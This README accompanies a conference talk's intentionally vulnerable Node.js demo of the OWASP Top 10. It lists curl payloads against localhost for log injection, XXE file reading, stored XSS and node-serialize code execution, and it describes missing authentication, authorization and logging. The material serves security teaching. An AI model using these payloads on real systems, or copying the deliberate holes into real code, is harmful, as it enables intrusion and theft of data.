This repo contains the code examples shared in my DevConf.us 2020 talk.
Recordings:
Slides: SlideShare
These demos contain intentionally vulnerable code.
Do not run any of them on a machine which can be accessed by external users.
- Git - For cloning the repo
- npm
- curl - Not required for running the demo, but some instructions use it
Clone the repository:
git clone https://github.com/mureinik/owasp-top10-demo.git
Install the dependencies:
npm install
Run the Log Injection demo:
node logi.js
Send a payload of the form username=XYZ logged in.\nABC&password=123:
curl -d $'username=allon logged in with the password: fakepassword.\nmureinik&password=123' http://localhost:3000/logi
You'll see two log in messages in the application's console.
Run the login demo:
node logi.js
Open your browser and navigate to http://localhost:3000/logi.html. As you can easily see, any combination of username and password will be accepted by the system. A proper system should have real user management implemented.
Run the login demo:
node logi.js
Open your browser and navigate to http://localhost:3000/logi.html. You can use any combination of username and password to log in, and the password will be presented in plain text in the application's console.
Run the XXE demo:
node logi.js
Send a payload with the following form:
curl -d '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/full/path/to/owasp-top10-demo/secret.txt">]><name>&xxe;</name>' http://localhost:3000/xxe
And you should get back the contents of the secret.txt file, i.e., THIS IS A SECRET!!!.
Run the session demo:
node session.js
If you use your browser to navigate to http://localhost:3000/data you'll get an error stating not logged in, which is
expected.
You can navigate to http://localhost:3000/session.html and use the credentials user1/password1 to log in, after
which you'll be redirected to http://localhost:3000/data?username=user1 and we that user's data. Similarly, you can use
the credentials user2/password2, and will see a different set of data. However, if you log in as user1, you could
manually navigate to http://localhost:3000/data?username=user2, and will see that user's data.
In other words, this demo implements authentication, but does not implement authorization.
There are several security misconfigurations in these demos. A few obvious ones include:
- All the demos serve HTTP and not HTTPS
- xxe.js sets
noent: truewhen creating the libxmljs parser, thus making the demo vulnerable to XXE - session.js uses Express Session, but uses the default configuration (e.g., it doesn't set the
secureormaxAgeproperties)
Run the XSS demo:
node xss.js
If you use your browser to navigate to http://localhost:3000/xss, you'll see a comments form where you could add your opinion of DevConf.us and view previous comments
Send a payload of the following form:
curl -X POST -d 'comment=<script>window.location.replace("https://github.com/mureinik/owasp-top10-demo")</script>' http://localhost:3000/xss
The next time you navigate to http://localhost:3000/xss, you'll be redirected to this README page.
Run the keys demo:
node keys.js
Send a payload containing a function definition followed by a ():
curl -X POST -H "Content-Type: text/plain" -d '{"key": "_$$ND_FUNC$$_function (){ console.log(\"unserialized!\"); }()"}' http://localhost:3000/keys
You'll see the text "userialized!" printed out in the application's console, proving that arbitrary code could be
executed. Of course, you could use more malicious code than console.log.
Run an audit:
npm audit
You will see the vulnerable packages this project depends on.
Run the session demo:
node session.js
Use your browser to navigate to http://localhost:3000/session.html.
If you use the wrong credentials (e.g., wronguser/wrongpassword) you'll get an error message, but nothing will be
logged.
In fact, this "application" doesn't even have any real logs.